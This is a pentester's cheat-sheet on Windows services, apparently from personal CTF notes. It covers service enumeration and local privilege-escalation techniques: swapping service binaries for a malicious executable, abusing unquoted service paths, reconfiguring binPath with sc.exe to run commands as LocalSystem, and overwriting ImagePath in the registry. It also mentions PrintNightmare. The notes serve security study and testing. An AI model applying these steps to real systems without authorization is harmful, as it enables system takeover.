Windows services
You can learn more about Windows services here.
- πΊοΈ List services
PS> Get-Service
PS> net start
PS> sc.exe query # with infos
- π Get more info about a service
PS> sc.exe qc xxx
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: xxx
[...]
BINARY_PATH_NAME : C:\[...]\service.exe
[...]
- π To view the permissions of the user on a service
PS> .\PsService.exe security service_name
PS> sc.exe sdshow service_name
PS> accesschk.exe ./xxx.exe -v
PS> accesschk.exe /accepteula -quvcw ./xxx.exe
π₯ In CTFs, you may be able to start/stop the service manually, while you may also do that if you are a server operator.
PS> sc.exe stop xxx
PS> # do your job
PS> sc.exe start xxx
π Notable services: vss, dns, Spooler, wuauserv, AppReadiness, etc.
Pentester Notes β οΈ
Insecure permissions
The current user may be able to replace the service with a malicious executable (ex: revshell.exe)
PS> icacls C:\[...]\service.exe
PS> move C:\[...]\service.exe C:\[...]\service.exe.old
PS> icacls C:\[...]\malicious.exe /grant Everyone:F
Unquoted Service Path
If the service is using a PATH in which there are spaces, the service isn't quoted, and the hacker can create files, then the hacker may create an executable that is executed with the rest of the path in argument.
PS> icacls $Env:appdata\Vulnerable Program\service.exe
PS> move C:\[...]\malicious.exe $Env:appdata\Vulnerable.exe
PS> # the service will execute
PS> # $Env:appdata\Vulnerable.exe Program\service.exe
You can find such services using:
CMD> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
PS> wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | Where-Object {$_ -notmatch '".*?"' -and $_ -match '\S'}
Insecure Service Permissions
It occurs if we can edit the permissions of a service, such as being able to change the location of the binary. Use the accesschk command. If the user is granted SERVICE_ALL_ACCESS on the service, then have fun.
PS> sc.exe config xxx binPath=C:\[...]\malicious.exe
PS> sc.exe config xxx binPath=C:\[...]\malicious.exe obj= LocalSystem
A common approach to execute a command is to use:
PS> sc.exe config XXX binPath= "cmd /c <some command here>"
PS> sc.exe config XXX binPath= "C:\windows\system32\cmd.exe /c <some command here>"
PS> sc.exe start XXX # fails but executed the command
Insecure Registry
Windows stores in hklm\System\CurrentControlSet\services variable service configurations. ImagePath reference the path to the executable related to a service. We may be able to override some values:
Detect
PS> .\accesschk.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\services
Exploit
PS> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\XXX -Name "ImagePath" -Value "<some command here>"
PS> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\XXX -Name "ImagePath" -Value "C:/<path_to_executable>"
Well-Known CVEs
- PrintNightmare (CVE-2021-1675) vulnerability in Spooler service.
π» To-do π»
Stuff that I found, but never read/used yet.
- It's recommended to use service accounts for services.
- Most services run with LocalSystem privileges by default
- From the SCM, we can configure an application to be executed if a service fails. If one was configured, it can be exploited.